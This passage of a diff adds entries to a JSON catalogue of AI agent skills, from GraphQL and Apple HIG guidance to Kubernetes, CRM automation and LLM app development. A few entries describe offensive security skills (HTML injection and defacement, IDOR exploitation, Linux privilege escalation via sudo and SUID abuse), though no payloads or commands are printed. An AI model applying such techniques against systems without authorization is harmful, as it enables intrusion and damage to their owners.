+ "description": "Master modern GraphQL with federation, performance optimization, and enterprise security. Build scalable schemas, implement advanced caching, and design real-time systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "grpc-golang",
+ "path": "skills/grpc-golang",
+ "category": "uncategorized",
+ "name": "grpc-golang",
+ "description": "Build production-ready gRPC services in Go with mTLS, streaming, and observability. Use when designing Protobuf contracts with Buf or implementing secure service-to-service transport.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "haskell-pro",
+ "path": "skills/haskell-pro",
+ "category": "uncategorized",
+ "name": "haskell-pro",
+ "description": "Expert Haskell engineer specializing in advanced type systems, pure",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "helm-chart-scaffolding",
+ "path": "skills/helm-chart-scaffolding",
+ "category": "uncategorized",
+ "name": "helm-chart-scaffolding",
+ "description": "Design, organize, and manage Helm charts for templating and packaging Kubernetes applications with reusable configurations. Use when creating Helm charts, packaging Kubernetes applications, or impl...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "helpdesk-automation",
+ "path": "skills/helpdesk-automation",
+ "category": "uncategorized",
+ "name": "helpdesk-automation",
+ "description": "Automate HelpDesk tasks via Rube MCP (Composio): list tickets, manage views, use canned responses, and configure custom fields. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hierarchical-agent-memory",
+ "path": "skills/hierarchical-agent-memory",
+ "category": "uncategorized",
+ "name": "hierarchical-agent-memory",
+ "description": "Scoped CLAUDE.md memory system that reduces context token spend. Creates directory-level context files, tracks savings via dashboard, and routes agents to the right sub-context.",
+ "risk": "safe",
+ "source": "https://github.com/kromahlusenii-ops/ham",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-content",
+ "path": "skills/hig-components-content",
+ "category": "uncategorized",
+ "name": "hig-components-content",
+ "description": "Apple Human Interface Guidelines for content display components.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-controls",
+ "path": "skills/hig-components-controls",
+ "category": "uncategorized",
+ "name": "hig-components-controls",
+ "description": "Apple HIG guidance for selection and input controls including pickers, toggles, sliders, steppers, segmented controls, combo boxes, text fields, text views, labels, token fields, virtual...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-dialogs",
+ "path": "skills/hig-components-dialogs",
+ "category": "uncategorized",
+ "name": "hig-components-dialogs",
+ "description": "Apple HIG guidance for presentation components including alerts, action sheets, popovers, sheets, and digit entry views.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-layout",
+ "path": "skills/hig-components-layout",
+ "category": "uncategorized",
+ "name": "hig-components-layout",
+ "description": "Apple Human Interface Guidelines for layout and navigation components.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-menus",
+ "path": "skills/hig-components-menus",
+ "category": "uncategorized",
+ "name": "hig-components-menus",
+ "description": "Apple HIG guidance for menu and button components including menus, context menus, dock menus, edit menus, the menu bar, toolbars, action buttons, pop-up buttons, pull-down buttons, disclosure...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-search",
+ "path": "skills/hig-components-search",
+ "category": "uncategorized",
+ "name": "hig-components-search",
+ "description": "Apple HIG guidance for navigation-related components including search fields, page controls, and path controls.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-status",
+ "path": "skills/hig-components-status",
+ "category": "uncategorized",
+ "name": "hig-components-status",
+ "description": "Apple HIG guidance for status and progress UI components including progress indicators, status bars, and activity rings.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-components-system",
+ "path": "skills/hig-components-system",
+ "category": "uncategorized",
+ "name": "hig-components-system",
+ "description": "Apple HIG guidance for system experience components: widgets, live activities, notifications, complications, home screen quick actions, top shelf, watch faces, app clips, and app shortcuts.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-foundations",
+ "path": "skills/hig-foundations",
+ "category": "uncategorized",
+ "name": "hig-foundations",
+ "description": "Apple Human Interface Guidelines design foundations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-inputs",
+ "path": "skills/hig-inputs",
+ "category": "uncategorized",
+ "name": "hig-inputs",
+ "description": "Apple HIG guidance for input methods and interaction patterns: gestures, Apple Pencil, keyboards, game controllers, pointers, Digital Crown, eye tracking, focus system, remotes, spatial...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-patterns",
+ "path": "skills/hig-patterns",
+ "category": "uncategorized",
+ "name": "hig-patterns",
+ "description": "Apple Human Interface Guidelines interaction and UX patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-platforms",
+ "path": "skills/hig-platforms",
+ "category": "uncategorized",
+ "name": "hig-platforms",
+ "description": "Apple Human Interface Guidelines for platform-specific design.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-project-context",
+ "path": "skills/hig-project-context",
+ "category": "uncategorized",
+ "name": "hig-project-context",
+ "description": "Create or update a shared Apple design context document that other HIG skills use to tailor guidance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hig-technologies",
+ "path": "skills/hig-technologies",
+ "category": "uncategorized",
+ "name": "hig-technologies",
+ "description": "Apple HIG guidance for Apple technology integrations: Siri, Apple Pay, HealthKit, HomeKit, ARKit, machine learning, generative AI, iCloud, Sign in with Apple, SharePlay, CarPlay, Game Center,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hosted-agents-v2-py",
+ "path": "skills/hosted-agents-v2-py",
+ "category": "uncategorized",
+ "name": "hosted-agents-v2-py",
+ "description": "Build hosted agents using Azure AI Projects SDK with ImageBasedHostedAgentDefinition. Use when creating container-based agents in Azure AI Foundry.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hr-pro",
+ "path": "skills/hr-pro",
+ "category": "uncategorized",
+ "name": "hr-pro",
+ "description": "Professional, ethical HR partner for hiring, onboarding/offboarding, PTO and leave, performance, compliant policies, and employee relations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "html-injection-testing",
+ "path": "skills/html-injection-testing",
+ "category": "uncategorized",
+ "name": "html-injection-testing",
+ "description": "This skill should be used when the user asks to \"test for HTML injection\", \"inject HTML into web pages\", \"perform HTML injection attacks\", \"deface web applications\", or \"test conten...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hubspot-automation",
+ "path": "skills/hubspot-automation",
+ "category": "uncategorized",
+ "name": "hubspot-automation",
+ "description": "Automate HubSpot CRM operations (contacts, companies, deals, tickets, properties) via Rube MCP using Composio integration.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hubspot-integration",
+ "path": "skills/hubspot-integration",
+ "category": "uncategorized",
+ "name": "hubspot-integration",
+ "description": "Expert patterns for HubSpot CRM integration including OAuth authentication, CRM objects, associations, batch operations, webhooks, and custom objects. Covers Node.js and Python SDKs. Use when: hubs...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hugging-face-cli",
+ "path": "skills/hugging-face-cli",
+ "category": "uncategorized",
+ "name": "hugging-face-cli",
+ "description": "Execute Hugging Face Hub operations using the `hf` CLI. Use when the user needs to download models/datasets/spaces, upload files to Hub repositories, create repos, manage local cache, or run comput...",
+ "risk": "safe",
+ "source": "https://github.com/huggingface/skills/tree/main/skills/hugging-face-cli",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hugging-face-jobs",
+ "path": "skills/hugging-face-jobs",
+ "category": "uncategorized",
+ "name": "hugging-face-jobs",
+ "description": "This skill should be used when users want to run any workload on Hugging Face Jobs infrastructure. Covers UV scripts, Docker-based jobs, hardware selection, cost estimation, authentication with tok...",
+ "risk": "safe",
+ "source": "https://github.com/huggingface/skills/tree/main/skills/hugging-face-jobs",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hybrid-cloud-architect",
+ "path": "skills/hybrid-cloud-architect",
+ "category": "uncategorized",
+ "name": "hybrid-cloud-architect",
+ "description": "Expert hybrid cloud architect specializing in complex multi-cloud solutions across AWS/Azure/GCP and private clouds (OpenStack/VMware).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hybrid-cloud-networking",
+ "path": "skills/hybrid-cloud-networking",
+ "category": "uncategorized",
+ "name": "hybrid-cloud-networking",
+ "description": "Configure secure, high-performance connectivity between on-premises infrastructure and cloud platforms using VPN and dedicated connections. Use when building hybrid cloud architectures, connecting ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "hybrid-search-implementation",
+ "path": "skills/hybrid-search-implementation",
+ "category": "uncategorized",
+ "name": "hybrid-search-implementation",
+ "description": "Combine vector and keyword search for improved retrieval. Use when implementing RAG systems, building search engines, or when neither approach alone provides sufficient recall.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "i18n-localization",
+ "path": "skills/i18n-localization",
+ "category": "uncategorized",
+ "name": "i18n-localization",
+ "description": "Internationalization and localization patterns. Detecting hardcoded strings, managing translations, locale files, RTL support.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "idor-testing",
+ "path": "skills/idor-testing",
+ "category": "uncategorized",
+ "name": "idor-testing",
+ "description": "This skill should be used when the user asks to \"test for insecure direct object references,\" \"find IDOR vulnerabilities,\" \"exploit broken access control,\" \"enumerate user IDs or obje...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "imagen",
+ "path": "skills/imagen",
+ "category": "uncategorized",
+ "name": "imagen",
+ "description": "AI image generation skill powered by Google Gemini, enabling seamless visual content creation for UI placeholders, documentation, and design assets.",
+ "risk": "safe",
+ "source": "https://github.com/sanjay3290/ai-skills/tree/main/skills/imagen",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "impress",
+ "path": "skills/libreoffice/impress",
+ "category": "presentation-processing",
+ "name": "impress",
+ "description": "Presentation creation, format conversion (ODP/PPTX/PDF), slide automation with LibreOffice Impress.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "incident-responder",
+ "path": "skills/incident-responder",
+ "category": "uncategorized",
+ "name": "incident-responder",
+ "description": "Expert SRE incident responder specializing in rapid problem resolution, modern observability, and comprehensive incident management.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "incident-response-incident-response",
+ "path": "skills/incident-response-incident-response",
+ "category": "uncategorized",
+ "name": "incident-response-incident-response",
+ "description": "Use when working with incident response incident response",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "incident-response-smart-fix",
+ "path": "skills/incident-response-smart-fix",
+ "category": "uncategorized",
+ "name": "incident-response-smart-fix",
+ "description": "[Extended thinking: This workflow implements a sophisticated debugging and resolution pipeline that leverages AI-assisted debugging tools and observability platforms to systematically diagnose and res",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "incident-runbook-templates",
+ "path": "skills/incident-runbook-templates",
+ "category": "uncategorized",
+ "name": "incident-runbook-templates",
+ "description": "Create structured incident response runbooks with step-by-step procedures, escalation paths, and recovery actions. Use when building runbooks, responding to incidents, or establishing incident resp...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "infinite-gratitude",
+ "path": "skills/infinite-gratitude",
+ "category": "uncategorized",
+ "name": "infinite-gratitude",
+ "description": "Multi-agent research skill for parallel research execution (10 agents, battle-tested with real case studies).",
+ "risk": "safe",
+ "source": "https://github.com/sstklen/infinite-gratitude",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "inngest",
+ "path": "skills/inngest",
+ "category": "uncategorized",
+ "name": "inngest",
+ "description": "Inngest expert for serverless-first background jobs, event-driven workflows, and durable execution without managing queues or workers. Use when: inngest, serverless background job, event-driven wor...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "instagram-automation",
+ "path": "skills/instagram-automation",
+ "category": "uncategorized",
+ "name": "instagram-automation",
+ "description": "Automate Instagram tasks via Rube MCP (Composio): create posts, carousels, manage media, get insights, and publishing limits. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "interactive-portfolio",
+ "path": "skills/interactive-portfolio",
+ "category": "uncategorized",
+ "name": "interactive-portfolio",
+ "description": "Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios,...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "intercom-automation",
+ "path": "skills/intercom-automation",
+ "category": "uncategorized",
+ "name": "intercom-automation",
+ "description": "Automate Intercom tasks via Rube MCP (Composio): conversations, contacts, companies, segments, admins. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "internal-comms-anthropic",
+ "path": "skills/internal-comms-anthropic",
+ "category": "uncategorized",
+ "name": "internal-comms-anthropic",
+ "description": "A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. Claude should use this skill whenever asked to write some sort of internal ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "internal-comms-community",
+ "path": "skills/internal-comms-community",
+ "category": "uncategorized",
+ "name": "internal-comms-community",
+ "description": "A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. Claude should use this skill whenever asked to write some sort of internal ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "inventory-demand-planning",
+ "path": "skills/inventory-demand-planning",
+ "category": "uncategorized",
+ "name": "inventory-demand-planning",
+ "description": "Codified expertise for demand forecasting, safety stock optimisation, replenishment planning, and promotional lift estimation at multi-location retailers.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ios-developer",
+ "path": "skills/ios-developer",
+ "category": "uncategorized",
+ "name": "ios-developer",
+ "description": "Develop native iOS applications with Swift/SwiftUI. Masters iOS 18, SwiftUI, UIKit integration, Core Data, networking, and App Store optimization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "istio-traffic-management",
+ "path": "skills/istio-traffic-management",
+ "category": "uncategorized",
+ "name": "istio-traffic-management",
+ "description": "Configure Istio traffic management including routing, load balancing, circuit breakers, and canary deployments. Use when implementing service mesh traffic policies, progressive delivery, or resilie...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "iterate-pr",
+ "path": "skills/iterate-pr",
+ "category": "uncategorized",
+ "name": "iterate-pr",
+ "description": "Iterate on a PR until CI passes. Use when you need to fix CI failures, address review feedback, or continuously push fixes until all checks are green. Automates the feedback-fix-push-wait cycle.",
+ "risk": "safe",
+ "source": "https://github.com/getsentry/skills/tree/main/plugins/sentry-skills/skills/iterate-pr",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "java-pro",
+ "path": "skills/java-pro",
+ "category": "uncategorized",
+ "name": "java-pro",
+ "description": "Master Java 21+ with modern features like virtual threads, pattern matching, and Spring Boot 3.x. Expert in the latest Java ecosystem including GraalVM, Project Loom, and cloud-native patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "javascript-mastery",
+ "path": "skills/javascript-mastery",
+ "category": "uncategorized",
+ "name": "javascript-mastery",
+ "description": "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. From fundamentals like primitives and closures to advanced patterns like async/await and functional p...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "javascript-pro",
+ "path": "skills/javascript-pro",
+ "category": "uncategorized",
+ "name": "javascript-pro",
+ "description": "Master modern JavaScript with ES6+, async patterns, and Node.js APIs. Handles promises, event loops, and browser/Node compatibility.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "javascript-testing-patterns",
+ "path": "skills/javascript-testing-patterns",
+ "category": "uncategorized",
+ "name": "javascript-testing-patterns",
+ "description": "Implement comprehensive testing strategies using Jest, Vitest, and Testing Library for unit tests, integration tests, and end-to-end testing with mocking, fixtures, and test-driven development. Use...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "javascript-typescript-typescript-scaffold",
+ "path": "skills/javascript-typescript-typescript-scaffold",
+ "category": "uncategorized",
+ "name": "javascript-typescript-typescript-scaffold",
+ "description": "You are a TypeScript project architecture expert specializing in scaffolding production-ready Node.js and frontend applications. Generate complete project structures with modern tooling (pnpm, Vite, N",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "jira-automation",
+ "path": "skills/jira-automation",
+ "category": "uncategorized",
+ "name": "jira-automation",
+ "description": "Automate Jira tasks via Rube MCP (Composio): issues, projects, sprints, boards, comments, users. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "julia-pro",
+ "path": "skills/julia-pro",
+ "category": "uncategorized",
+ "name": "julia-pro",
+ "description": "Master Julia 1.10+ with modern features, performance optimization, multiple dispatch, and production-ready practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "k8s-manifest-generator",
+ "path": "skills/k8s-manifest-generator",
+ "category": "uncategorized",
+ "name": "k8s-manifest-generator",
+ "description": "Create production-ready Kubernetes manifests for Deployments, Services, ConfigMaps, and Secrets following best practices and security standards. Use when generating Kubernetes YAML manifests, creat...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "k8s-security-policies",
+ "path": "skills/k8s-security-policies",
+ "category": "uncategorized",
+ "name": "k8s-security-policies",
+ "description": "Implement Kubernetes security policies including NetworkPolicy, PodSecurityPolicy, and RBAC for production-grade security. Use when securing Kubernetes clusters, implementing network isolation, or ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "kaizen",
+ "path": "skills/kaizen",
+ "category": "uncategorized",
+ "name": "kaizen",
+ "description": "Guide for continuous improvement, error proofing, and standardization. Use this skill when the user wants to improve code quality, refactor, or discuss process improvements.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "klaviyo-automation",
+ "path": "skills/klaviyo-automation",
+ "category": "uncategorized",
+ "name": "klaviyo-automation",
+ "description": "Automate Klaviyo tasks via Rube MCP (Composio): manage email/SMS campaigns, inspect campaign messages, track tags, and monitor send jobs. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "kotlin-coroutines-expert",
+ "path": "skills/kotlin-coroutines-expert",
+ "category": "uncategorized",
+ "name": "kotlin-coroutines-expert",
+ "description": "Expert patterns for Kotlin Coroutines and Flow, covering structured concurrency, error handling, and testing.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "kpi-dashboard-design",
+ "path": "skills/kpi-dashboard-design",
+ "category": "uncategorized",
+ "name": "kpi-dashboard-design",
+ "description": "Design effective KPI dashboards with metrics selection, visualization best practices, and real-time monitoring patterns. Use when building business dashboards, selecting metrics, or designing data ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "kubernetes-architect",
+ "path": "skills/kubernetes-architect",
+ "category": "uncategorized",
+ "name": "kubernetes-architect",
+ "description": "Expert Kubernetes architect specializing in cloud-native infrastructure, advanced GitOps workflows (ArgoCD/Flux), and enterprise container orchestration.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "kubernetes-deployment",
+ "path": "skills/kubernetes-deployment",
+ "category": "granular-workflow-bundle",
+ "name": "kubernetes-deployment",
+ "description": "Kubernetes deployment workflow for container orchestration, Helm charts, service mesh, and production-ready K8s configurations.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "langchain-architecture",
+ "path": "skills/langchain-architecture",
+ "category": "uncategorized",
+ "name": "langchain-architecture",
+ "description": "Design LLM applications using the LangChain framework with agents, memory, and tool integration patterns. Use when building LangChain applications, implementing AI agents, or creating complex LLM w...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "langfuse",
+ "path": "skills/langfuse",
+ "category": "uncategorized",
+ "name": "langfuse",
+ "description": "Expert in Langfuse - the open-source LLM observability platform. Covers tracing, prompt management, evaluation, datasets, and integration with LangChain, LlamaIndex, and OpenAI. Essential for debug...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "langgraph",
+ "path": "skills/langgraph",
+ "category": "uncategorized",
+ "name": "langgraph",
+ "description": "Expert in LangGraph - the production-grade framework for building stateful, multi-actor AI applications. Covers graph construction, state management, cycles and branches, persistence with checkpoin...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "laravel-expert",
+ "path": "skills/laravel-expert",
+ "category": "uncategorized",
+ "name": "laravel-expert",
+ "description": "Senior Laravel Engineer role for production-grade, maintainable, and idiomatic Laravel solutions. Focuses on clean architecture, security, performance, and modern standards (Laravel 10/11+).",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "laravel-security-audit",
+ "path": "skills/laravel-security-audit",
+ "category": "uncategorized",
+ "name": "laravel-security-audit",
+ "description": "Security auditor for Laravel applications. Analyzes code for vulnerabilities, misconfigurations, and insecure practices using OWASP standards and Laravel security best practices.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "last30days",
+ "path": "skills/last30days",
+ "category": "uncategorized",
+ "name": "last30days",
+ "description": "Research a topic from the last 30 days on Reddit + X + Web, become an expert, and write copy-paste-ready prompts for the user's target tool.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "launch-strategy",
+ "path": "skills/launch-strategy",
+ "category": "uncategorized",
+ "name": "launch-strategy",
+ "description": "When the user wants to plan a product launch, feature announcement, or release strategy. Also use when the user mentions 'launch,' 'Product Hunt,' 'feature release,' 'announcement,' 'go-to-market,'...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "legacy-modernizer",
+ "path": "skills/legacy-modernizer",
+ "category": "uncategorized",
+ "name": "legacy-modernizer",
+ "description": "Refactor legacy codebases, migrate outdated frameworks, and implement gradual modernization. Handles technical debt, dependency updates, and backward compatibility.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "legal-advisor",
+ "path": "skills/legal-advisor",
+ "category": "uncategorized",
+ "name": "legal-advisor",
+ "description": "Draft privacy policies, terms of service, disclaimers, and legal notices. Creates GDPR-compliant texts, cookie policies, and data processing agreements.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linear-automation",
+ "path": "skills/linear-automation",
+ "category": "uncategorized",
+ "name": "linear-automation",
+ "description": "Automate Linear tasks via Rube MCP (Composio): issues, projects, cycles, teams, labels. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linear-claude-skill",
+ "path": "skills/linear-claude-skill",
+ "category": "uncategorized",
+ "name": "linear-claude-skill",
+ "description": "Manage Linear issues, projects, and teams",
+ "risk": "safe",
+ "source": "https://github.com/wrsmith108/linear-claude-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linkedin-automation",
+ "path": "skills/linkedin-automation",
+ "category": "uncategorized",
+ "name": "linkedin-automation",
+ "description": "Automate LinkedIn tasks via Rube MCP (Composio): create posts, manage profile, company info, comments, and image uploads. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linkedin-cli",
+ "path": "skills/linkedin-cli",
+ "category": "uncategorized",
+ "name": "linkedin-cli",
+ "description": "Use when automating LinkedIn via CLI: fetch profiles, search people/companies, send messages, manage connections, create posts, and Sales Navigator.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linkerd-patterns",
+ "path": "skills/linkerd-patterns",
+ "category": "uncategorized",
+ "name": "linkerd-patterns",
+ "description": "Implement Linkerd service mesh patterns for lightweight, security-focused service mesh deployments. Use when setting up Linkerd, configuring traffic policies, or implementing zero-trust networking ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "lint-and-validate",
+ "path": "skills/lint-and-validate",
+ "category": "uncategorized",
+ "name": "lint-and-validate",
+ "description": "Automatic quality control, linting, and static analysis procedures. Use after every code modification to ensure syntax correctness and project standards. Triggers onKeywords: lint, format, check, v...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linux-privilege-escalation",
+ "path": "skills/linux-privilege-escalation",
+ "category": "uncategorized",
+ "name": "linux-privilege-escalation",
+ "description": "This skill should be used when the user asks to \"escalate privileges on Linux\", \"find privesc vectors on Linux systems\", \"exploit sudo misconfigurations\", \"abuse SUID binaries\", \"ex...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linux-shell-scripting",
+ "path": "skills/linux-shell-scripting",
+ "category": "uncategorized",
+ "name": "linux-shell-scripting",
+ "description": "This skill should be used when the user asks to \"create bash scripts\", \"automate Linux tasks\", \"monitor system resources\", \"backup files\", \"manage users\", or \"write production she...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "linux-troubleshooting",
+ "path": "skills/linux-troubleshooting",
+ "category": "granular-workflow-bundle",
+ "name": "linux-troubleshooting",
+ "description": "Linux system troubleshooting workflow for diagnosing and resolving system issues, performance problems, and service failures.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "llm-app-patterns",
+ "path": "skills/llm-app-patterns",
+ "category": "uncategorized",
+ "name": "llm-app-patterns",
+ "description": "Production-ready patterns for building LLM applications. Covers RAG pipelines, agent architectures, prompt IDEs, and LLMOps monitoring. Use when designing AI applications, implementing RAG, buildin...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "llm-application-dev-ai-assistant",
+ "path": "skills/llm-application-dev-ai-assistant",
+ "category": "uncategorized",
+ "name": "llm-application-dev-ai-assistant",
+ "description": "You are an AI assistant development expert specializing in creating intelligent conversational interfaces, chatbots, and AI-powered applications. Design comprehensive AI assistant solutions with natur",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "llm-application-dev-langchain-agent",
+ "path": "skills/llm-application-dev-langchain-agent",
+ "category": "uncategorized",
+ "name": "llm-application-dev-langchain-agent",
+ "description": "You are an expert LangChain agent developer specializing in production-grade AI systems using LangChain 0.1+ and LangGraph.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "llm-application-dev-prompt-optimize",
+ "path": "skills/llm-application-dev-prompt-optimize",
+ "category": "uncategorized",
+ "name": "llm-application-dev-prompt-optimize",
+ "description": "You are an expert prompt engineer specializing in crafting effective prompts for LLMs through advanced techniques including constitutional AI, chain-of-thought reasoning, and model-specific optimizati",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "llm-evaluation",
+ "path": "skills/llm-evaluation",
+ "category": "uncategorized",
+ "name": "llm-evaluation",
+ "description": "Implement comprehensive evaluation strategies for LLM applications using automated metrics, human feedback, and benchmarking. Use when testing LLM performance, measuring AI application quality, or ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "local-legal-seo-audit",
+ "path": "skills/local-legal-seo-audit",
